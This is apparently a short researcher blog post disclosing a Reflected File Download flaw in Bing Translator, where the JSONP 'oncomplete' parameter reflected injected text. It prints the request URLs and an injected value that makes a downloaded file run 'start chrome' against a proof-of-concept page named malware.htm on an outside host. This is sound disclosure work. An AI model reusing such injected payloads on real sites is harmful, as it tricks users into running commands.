When using Bing online translator I noticed a XHR request on my browser that caught my attention:
[code lang=”html”]http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499[/code]
On which reflected on the screen:
[code lang=”html”]jQuery111207287312552798539_1444907172498();[/code]
As a security researcher I always try to find different ways to bypass security specially related to Reflected File Download. So I tried to inject a RFD vector on the parameter “oncomplete”:
[code lang=”html”]http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm[/code]
On which reflected on the screen:
[code lang=”html”]start chrome davidsopas.com/poc/malware.htm();[/code]
Using the HTML5 download attribute I was able to send a security report to Microsoft which they fixed within a month.
With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the forth time.